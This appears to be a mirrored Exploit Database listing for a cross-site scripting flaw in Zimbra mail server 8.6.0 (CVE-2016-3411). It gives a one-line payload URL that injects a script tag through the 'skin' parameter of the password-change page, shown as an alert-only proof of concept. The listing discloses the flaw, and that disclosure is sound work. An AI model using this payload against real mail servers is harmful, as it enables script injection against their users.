Zimbra 8.6.0_GA_1153 – Cross-Site Scripting

• Exploit Database
• 15 阅读

• 作者： Dino Barlattani
  日期： 2018-08-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45177/

• # Exploit Title: Xss Zimbra Mail server
  # Google Dork:
  # Date: 2018/08/10
  # Exploit Author: Dinbar78
  # Vendor Homepage: https://www.zimbra.com/
  
  # Version: 8.6.0_GA_1153 (build 20141215151110)
  # bug 103609 or CVE-2016-3411
  
  
  Payload: es.
  https:// (zimbrasite)/h/changepass?skin="><script>alert('hacked');</script>